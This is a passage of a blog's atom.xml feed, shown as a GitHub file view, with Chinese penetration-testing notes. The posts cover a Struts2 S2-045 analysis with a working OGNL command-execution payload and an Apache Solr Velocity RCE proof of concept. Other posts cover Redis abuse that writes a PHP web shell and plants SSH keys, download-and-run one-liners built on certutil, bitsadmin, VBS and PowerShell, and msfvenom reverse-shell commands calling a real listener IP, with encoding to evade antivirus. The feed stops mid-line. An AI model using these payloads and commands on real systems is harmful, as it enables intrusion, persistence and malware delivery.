-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathatom.xml
544 lines (286 loc) · 287 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>tusk1'Blog</title>
<link href="/atom.xml" rel="self"/>
<link href="http://yoursite.com/"/>
<updated>2020-03-14T15:39:28.942Z</updated>
<id>http://yoursite.com/</id>
<author>
<name>tusk1</name>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title>struts2漏洞分析之S2-045</title>
<link href="http://yoursite.com/2020/03/14/struts2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8BS2-045/"/>
<id>http://yoursite.com/2020/03/14/struts2漏洞分析之S2-045/</id>
<published>2020-03-14T15:28:47.000Z</published>
<updated>2020-03-14T15:39:28.942Z</updated>
<content type="html"><![CDATA[<h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>影响版本:2.3.31-2.3.5 2.5-2.5.10.1 </p><p>漏洞原因:在处理上传文件的方法中,content-type中存在payload,处理错误并捕捉了异常信息(里面带有payload),后又OGNL解析</p><h3 id="调试分析"><a href="#调试分析" class="headerlink" title="调试分析"></a>调试分析</h3><p>在获取action mapper前会对HttpServletRequest做一次封装。<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-1.png" alt=""><br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-2.png" alt=""> </p><p>检测content-type中是否存在multi/form-data,即检查是否上传文件,如果上传文件则对上传文件进行处理<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-3.png" alt=""> </p><p>该处对上传文件进行保存,跟进该方法<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-4.png" alt=""><br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-5.png" alt=""> </p><p>如果处理文件异常,则会进入buildErrorMessage方法,跟进<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-6.png" alt=""> </p><p>该方法将错误信息传入findText方法进行处理,跟进<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-7.png" alt=""> </p><p>可以看到defaultMessage中包含了恶意代码,继续跟进<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-8.png" alt=""> </p><p>该处将defaultMessage传入getDefaultMessage方法中,跟进<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-9.png" alt=""> </p><p>这个地方getDefaultMessage被传递给message,而message则调用TextParseUtil.translateVariables进行处理,跟进<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-11.png" alt=""><br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-12.png" alt=""> </p><p>可以看到恶意代码被传入parser.evaluate中,而该方法会执行ognl表达式,跟进分析<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-13.png" alt=""> </p><p>这个地方expression中的ognl表达式被筛选出来并传递给了var,而var则传入evaluator.evaluate方法,跟进<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-14.png" alt=""> </p><p>将值传入stack.findValue中<br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-15.png" alt=""><br><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-16.png" alt=""> </p><p>最终传递到getValue方法执行表达式</p><h3 id="poc"><a href="#poc" class="headerlink" title="poc"></a>poc</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-Type:"%{(#xxx='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"whoami"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"</span><br></pre></td></tr></table></figure><p><img src="/2020/03/14/struts2漏洞分析之S2-045/3-14-17.png" alt=""></p>]]></content>
<summary type="html">
<h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>影响版本:2.3.31-2.3.5 2.5-2.5.10.1 </p>
<p>漏洞原因:在处理上传文件的方法中,content-type中
</summary>
<category term="web安全" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/"/>
<category term="代码审计" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="RCE" scheme="http://yoursite.com/tags/RCE/"/>
<category term="Java" scheme="http://yoursite.com/tags/Java/"/>
</entry>
<entry>
<title>Apache_Solr_RCE利用脚本</title>
<link href="http://yoursite.com/2019/11/09/Apache-Solr-RCE%E5%88%A9%E7%94%A8%E8%84%9A%E6%9C%AC/"/>
<id>http://yoursite.com/2019/11/09/Apache-Solr-RCE利用脚本/</id>
<published>2019-11-08T16:20:21.000Z</published>
<updated>2019-11-08T16:26:32.703Z</updated>
<content type="html"><![CDATA[<h2 id="Apache-Solr-RCE-via-Velocity"><a href="#Apache-Solr-RCE-via-Velocity" class="headerlink" title="Apache_Solr_RCE_via_Velocity"></a>Apache_Solr_RCE_via_Velocity</h2><p>最近Apache Solr爆出了一个RCE 0day漏洞,利用前提是存在未授权访问。原作者给出的POC如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">Apache Solr RCE via Velocity template</span><br><span class="line"></span><br><span class="line">Set "params.resource.loader.enabled" as true.</span><br><span class="line"></span><br><span class="line">Request:</span><br><span class="line">========================================================================</span><br><span class="line">POST /solr/test/config HTTP/1.1</span><br><span class="line">Host: solr:8983</span><br><span class="line">Content-Type: application/json</span><br><span class="line">Content-Length: 259</span><br><span class="line"></span><br><span class="line">{</span><br><span class="line"> "update-queryresponsewriter": {</span><br><span class="line"> "startup": "lazy",</span><br><span class="line"> "name": "velocity",</span><br><span class="line"> "class": "solr.VelocityResponseWriter",</span><br><span class="line"> "template.base.dir": "",</span><br><span class="line"> "solr.resource.loader.enabled": "true",</span><br><span class="line"> "params.resource.loader.enabled": "true"</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">========================================================================</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">RCE via velocity template</span><br><span class="line">Request:</span><br><span class="line">========================================================================</span><br><span class="line">GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1</span><br><span class="line">Host: localhost:8983</span><br><span class="line">========================================================================</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Response:</span><br><span class="line">========================================================================</span><br><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Content-Type: text/html;charset=utf-8</span><br><span class="line">Content-Length: 56</span><br><span class="line"></span><br><span class="line"> 0 uid=8983(solr) gid=8983(solr) groups=8983(solr)</span><br><span class="line">========================================================================</span><br></pre></td></tr></table></figure></p><p>实际环境中将test替换为Core Admin中得到的应用路径:<br><img src="/2019/11/09/Apache-Solr-RCE利用脚本/11-8-1.png" alt=""><br>本项目是根据POC写出的java利用脚本:<br><img src="/2019/11/09/Apache-Solr-RCE利用脚本/11-8-2.png" alt=""><br>先进行配置检测,然后再执行命令<br>项目地址:<a href="https://github.com/TU-SJ/Apache_Solr_RCE_via_Velocity" target="_blank" rel="noopener">https://github.com/TU-SJ/Apache_Solr_RCE_via_Velocity</a></p>]]></content>
<summary type="html">
<h2 id="Apache-Solr-RCE-via-Velocity"><a href="#Apache-Solr-RCE-via-Velocity" class="headerlink" title="Apache_Solr_RCE_via_Velocity"></a>Ap
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="RCE" scheme="http://yoursite.com/tags/RCE/"/>
</entry>
<entry>
<title>渗透测试笔记6-redis写shell</title>
<link href="http://yoursite.com/2019/10/03/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B06-redis%E5%86%99shell/"/>
<id>http://yoursite.com/2019/10/03/渗透测试笔记6-redis写shell/</id>
<published>2019-10-03T08:39:20.000Z</published>
<updated>2019-10-03T08:40:45.902Z</updated>
<content type="html"><![CDATA[<h1 id="通过备份文件"><a href="#通过备份文件" class="headerlink" title="通过备份文件"></a>通过备份文件</h1><h2 id="写shell"><a href="#写shell" class="headerlink" title="写shell"></a>写shell</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">CONFIG SET dir /var/www/html </span><br><span class="line"></span><br><span class="line">CONGIG SET dbfilename shell.php </span><br><span class="line"></span><br><span class="line">SET shell "<?php system($_GET['cmd']);?>" </span><br><span class="line"></span><br><span class="line">BGSAVE</span><br></pre></td></tr></table></figure><h2 id="清除痕迹"><a href="#清除痕迹" class="headerlink" title="清除痕迹"></a>清除痕迹</h2><p>1)删除key<br>2)将dir和dbfilename更为原样<br>最好使用config get事先看看原来的值是啥。</p><h1 id="通过ssh"><a href="#通过ssh" class="headerlink" title="通过ssh"></a>通过ssh</h1><p>生成密钥对 </p><blockquote><blockquote><p>ssh-keygen -t rsa </p></blockquote></blockquote><p>生成一个临时文件 </p><blockquote><blockquote><p>(echo -e “\n\n\n”; cat id_rsa.pub; echo -e “\n\n\n”) > pub.txt </p></blockquote></blockquote><p>连接redis并存储数据到redis上 </p><blockquote><blockquote><p>cat pub.txt| redis-cli -h 192.168.2.155 -p 6379 -a 1q2w3e4r -x set gaia</p></blockquote></blockquote><p>设置目录,并保存文件<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">config set dir /root/.ssh/</span><br><span class="line">config set dbfilename "authorized_keys"</span><br><span class="line">save</span><br><span class="line">exit</span><br></pre></td></tr></table></figure></p><p>通过私钥连接登入服务器 </p><blockquote><blockquote><p>ssh -i id_rsa <a href="mailto:[email protected]" target="_blank" rel="noopener">[email protected]</a></p></blockquote></blockquote>]]></content>
<summary type="html">
<h1 id="通过备份文件"><a href="#通过备份文件" class="headerlink" title="通过备份文件"></a>通过备份文件</h1><h2 id="写shell"><a href="#写shell" class="headerlink" titl
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="内网渗透" scheme="http://yoursite.com/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/"/>
<category term="redis" scheme="http://yoursite.com/tags/redis/"/>
</entry>
<entry>
<title>渗透测试笔记5-一句话下载payload</title>
<link href="http://yoursite.com/2019/10/03/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B05-%E4%B8%80%E5%8F%A5%E8%AF%9D%E4%B8%8B%E8%BD%BDpayload/"/>
<id>http://yoursite.com/2019/10/03/渗透测试笔记5-一句话下载payload/</id>
<published>2019-10-03T08:37:33.000Z</published>
<updated>2019-10-03T08:52:03.444Z</updated>
<content type="html"><![CDATA[<h2 id="certutil"><a href="#certutil" class="headerlink" title="certutil"></a>certutil</h2><p>Certutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe转储 和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件以及验证证书, 密钥对和证书链</p><h3 id="下载"><a href="#下载" class="headerlink" title="下载"></a>下载</h3><p>默认下载后为bin文件,但不影响执行<br>certutil.exe -urlcache -split -f <a href="http://192.168.1.115/robots.txt" target="_blank" rel="noopener">http://192.168.1.115/robots.txt</a></p><h3 id="清除缓存"><a href="#清除缓存" class="headerlink" title="清除缓存"></a>清除缓存</h3><p>防止留下痕迹<br>certutil.exe -urlcache -split -f <a href="http://192.168.1.115/robots.txt" target="_blank" rel="noopener">http://192.168.1.115/robots.txt</a> delete</p><h2 id="vbs"><a href="#vbs" class="headerlink" title="vbs"></a>vbs</h2><p>保存<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">downfile.vbs set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp"):w.open "get",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2</span><br></pre></td></tr></table></figure></p><p>或者命令行下执行:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo set a=downfile.vbs set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp"):w.open "get",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs</span><br></pre></td></tr></table></figure></p><p>命令行下执行:</p><blockquote><blockquote><p> cscript downfile.vbs <a href="http://192.168.1.115/robots.txt" target="_blank" rel="noopener">http://192.168.1.115/robots.txt</a> C:\Inetpub\b.txt</p></blockquote></blockquote><h3 id="参数化下载"><a href="#参数化下载" class="headerlink" title="参数化下载"></a>参数化下载</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">strFileURL = "http://192.168.1.115/robots.txt" </span><br><span class="line">strHDLocation = "c:\test\logo.txt" </span><br><span class="line">Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")</span><br><span class="line"> objXMLHTTP.open "GET", strFileURL, false </span><br><span class="line"> objXMLHTTP.send() </span><br><span class="line">If objXMLHTTP.Status = 200 Then </span><br><span class="line">Set objADOStream = CreateObject("ADODB.Stream") </span><br><span class="line">objADOStream.Open </span><br><span class="line">objADOStream.Type = 1 </span><br><span class="line">objADOStream.Write objXMLHTTP.ResponseBody </span><br><span class="line">objADOStream.Position = 0 </span><br><span class="line">Set objFSO = CreateObject("Scripting.FileSystemObject") </span><br><span class="line">If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocati on </span><br><span class="line">Set objFSO = Nothing </span><br><span class="line">objADOStream.SaveToFile strHDLocation </span><br><span class="line">objADOStream.Close </span><br><span class="line">Set objADOStream = Nothing </span><br><span class="line">End if </span><br><span class="line">Set objXMLHTTP = Nothing</span><br></pre></td></tr></table></figure><h2 id="js"><a href="#js" class="headerlink" title="js"></a>js</h2><p>读取: </p><blockquote><blockquote><p>cscript /nologo downfile.js <a href="http://192.168.1.115/robots.txt" target="_blank" rel="noopener">http://192.168.1.115/robots.txt</a></p></blockquote></blockquote><p>代码:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");</span><br><span class="line">WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);</span><br><span class="line">WinHttpReq.Send(); </span><br><span class="line">WScript.Echo(WinHttpReq.ResponseText);</span><br></pre></td></tr></table></figure></p><p>写入:</p><blockquote><blockquote><p>cscript /nologo dowfile2.js <a href="http://192.168.1.115/robots.txt" target="_blank" rel="noopener">http://192.168.1.115/robots.txt</a></p></blockquote></blockquote><p>代码:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");</span><br><span class="line">WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); </span><br><span class="line">WinHttpReq.Send();</span><br><span class="line">BinStream = new ActiveXObject("ADODB.Stream");</span><br><span class="line">BinStream.Type = 1; </span><br><span class="line">BinStream.Open(); </span><br><span class="line">BinStream.Write(WinHttpReq.ResponseBody);</span><br><span class="line">BinStream.SaveToFile("micropoor.exe");</span><br></pre></td></tr></table></figure></p><h2 id="bitsadmin"><a href="#bitsadmin" class="headerlink" title="bitsadmin"></a>bitsadmin</h2><p>自windows7以上版本内置bitsadmin,它可以在网络不稳定的状态下下载文件,出错会自动重试,在比较复杂的网络环境下,有着不错的性能。</p><blockquote><blockquote><blockquote><p>bitsadmin /rawreturn /transfer down “<a href="http://192.168.1.115/robots.txt"" target="_blank" rel="noopener">http://192.168.1.115/robots.txt"</a> E:\PDF\robots.txt</p></blockquote></blockquote></blockquote><p>需要注意的是,bitsadmin要求服务器支持Range标头。<br>如果需要下载过大的文件,需要提高优先级。配合上面的下载命令。再次执行</p><blockquote><blockquote><p>bitsadmin /setpriority down foreground</p></blockquote></blockquote><p>如果下载文件在1-5M之间,需要时时查看进度。同样它也支持进度条。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bitsadmin /transfer down /download /priority normal "http://192.168.1.115/robots.txt" E:\PDF\robots.txt</span><br></pre></td></tr></table></figure></p><p>后者的话:不支持https协议。</p><h2 id="powershell"><a href="#powershell" class="headerlink" title="powershell"></a>powershell</h2><p>自Windows7以后内置了powershell,如Windows 7中内置了PowerShell2.0,Windows 8中内置了PowerShell3.0。</p><p>查看版本: </p><blockquote><blockquote><p>powershell $PSVersionTable</p></blockquote></blockquote><p>脚本:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$Urls = @()</span><br><span class="line">$Urls += "http://192.168.1.115/robots.txt"</span><br><span class="line">$OutPath = "E:\PDF\" </span><br><span class="line">ForEach ( $item in $Urls){ </span><br><span class="line">$file = $OutPath + ($item).split('/')[-1] </span><br><span class="line">(New-Object System.Net.WebClient).DownloadFile($item, $file)</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><blockquote><blockquote><p>powershell C:\inetpub\down.ps1</p></blockquote></blockquote><p>注:需要绝对路径</p><p>在powershell 3.0以后,提供wget功能,既Invoke-WebRequest<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$url = "http://192.168.1.115/robots.txt"</span><br><span class="line">$output = "C:\inetpub\robots.txt" </span><br><span class="line">$start_time = Get-Date </span><br><span class="line">Invoke-WebRequest -Uri $url -OutFile $output</span><br><span class="line">Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"</span><br></pre></td></tr></table></figure></p><p>一句话执行(实用):<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')</span><br></pre></td></tr></table></figure></p>]]></content>
<summary type="html">
<h2 id="certutil"><a href="#certutil" class="headerlink" title="certutil"></a>certutil</h2><p>Certutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certuti
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="内网渗透" scheme="http://yoursite.com/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/"/>
</entry>
<entry>
<title>渗透测试笔记4-msfvenom命令记录</title>
<link href="http://yoursite.com/2019/10/03/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AC%94%E8%AE%B04-msfvenom%E5%91%BD%E4%BB%A4%E8%AE%B0%E5%BD%95/"/>
<id>http://yoursite.com/2019/10/03/渗透测试笔记4-msfvenom命令记录/</id>
<published>2019-10-03T08:34:59.000Z</published>
<updated>2019-10-03T08:53:20.099Z</updated>
<content type="html"><![CDATA[<h2 id="有效命令"><a href="#有效命令" class="headerlink" title="有效命令"></a>有效命令</h2><p>msfvenom -p windows/x64/meterpreter/reverse_http lhost=114.116.33.191 lport=8888 -f exe>test_3.exe<br>msfvenom -p windows/meterpreter/reverse_http lhost=114.116.33.191 lport=8888 -f exe>test_4.exe</p><h2 id="用法"><a href="#用法" class="headerlink" title="用法"></a>用法</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">MsfVenom - a Metasploit standalone payload generator.</span><br><span class="line">Also a replacement for msfpayload and msfencode.</span><br><span class="line">Usage: /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfvenom [options] <var=val></span><br><span class="line">Example: /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe</span><br><span class="line"></span><br><span class="line">Options:</span><br><span class="line"> -l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, formats, all</span><br><span class="line"> -p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom</span><br><span class="line"> --list-options List --payload <value>'s standard, advanced and evasion options</span><br><span class="line"> -f, --format <format> Output format (use --list formats to list)</span><br><span class="line"> -e, --encoder <encoder> The encoder to use (use --list encoders to list)</span><br><span class="line"> --smallest Generate the smallest possible payload using all available encoders</span><br><span class="line"> -a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)</span><br><span class="line"> --platform <platform> The platform for --payload (use --list platforms to list)</span><br><span class="line"> -o, --out <path> Save the payload to a file</span><br><span class="line"> -b, --bad-chars <list> Characters to avoid example: '\x00\xff'</span><br><span class="line"> -n, --nopsled <length> Prepend a nopsled of [length] size on to the payload</span><br><span class="line"> --pad-nops Use nopsled size specified by -n <length> as the total payload size, thus performing a subtraction to prepend a nopsled of quantity (nops minus payload length)</span><br><span class="line"> -s, --space <length> The maximum size of the resulting payload</span><br><span class="line"> --encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)</span><br><span class="line"> -i, --iterations <count> The number of times to encode the payload</span><br><span class="line"> -c, --add-code <path> Specify an additional win32 shellcode file to include</span><br><span class="line"> -x, --template <path> Specify a custom executable file to use as a template</span><br><span class="line"> -k, --keep Preserve the --template behaviour and inject the payload as a new thread</span><br><span class="line"> -v, --var-name <value> Specify a custom variable name to use for certain output formats</span><br><span class="line"> -t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)</span><br><span class="line"> -h, --help Show this message</span><br></pre></td></tr></table></figure><h2 id="示例"><a href="#示例" class="headerlink" title="示例"></a>示例</h2><h4 id="生成不经过编码的普通payload(不编码-gt-生成内容固定-gt-直接被杀)"><a href="#生成不经过编码的普通payload(不编码-gt-生成内容固定-gt-直接被杀)" class="headerlink" title="生成不经过编码的普通payload(不编码->生成内容固定->直接被杀)"></a>生成不经过编码的普通payload(不编码->生成内容固定->直接被杀)</h4><p>msfvenom -p <payload> <payload options=""> -f <format> -o <path></path></format></payload></payload></p><blockquote><blockquote><p>msfvenom –p windows/meterpreter/reverse_tcp –f c –o 1.c</p></blockquote></blockquote><h4 id="经过编码器处理后生成payload"><a href="#经过编码器处理后生成payload" class="headerlink" title="经过编码器处理后生成payload"></a>经过编码器处理后生成payload</h4><p>msfvenom -p <payload> -e <encoder> -i <encoder times=""> -n <nopsled> -f <format> -o <path></path></format></nopsled></encoder></encoder></payload></p><blockquote><blockquote><p>msfvenom –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe</p></blockquote></blockquote><h4 id="捆绑到正常文件后生成payload(暂未测试是否可加-e参数)"><a href="#捆绑到正常文件后生成payload(暂未测试是否可加-e参数)" class="headerlink" title="捆绑到正常文件后生成payload(暂未测试是否可加-e参数)"></a>捆绑到正常文件后生成payload(暂未测试是否可加-e参数)</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Msfvenom –p windows/meterpreter/reverse_tcp –platform windows –a x86 –x C:\calc.exe –k –f exe –o C:\shell.exe</span><br></pre></td></tr></table></figure><h4 id="查看支持的payload列表"><a href="#查看支持的payload列表" class="headerlink" title="查看支持的payload列表"></a>查看支持的payload列表</h4><p>msfvenom -l payloads</p><h4 id="查看支持的输出文件类型"><a href="#查看支持的输出文件类型" class="headerlink" title="查看支持的输出文件类型"></a>查看支持的输出文件类型</h4><p>msfvenom –help-formats</p><h4 id="查看支持的编码方式:-为了达到免杀的效果"><a href="#查看支持的编码方式:-为了达到免杀的效果" class="headerlink" title="查看支持的编码方式:(为了达到免杀的效果)"></a>查看支持的编码方式:(为了达到免杀的效果)</h4><p>msfvenom -l 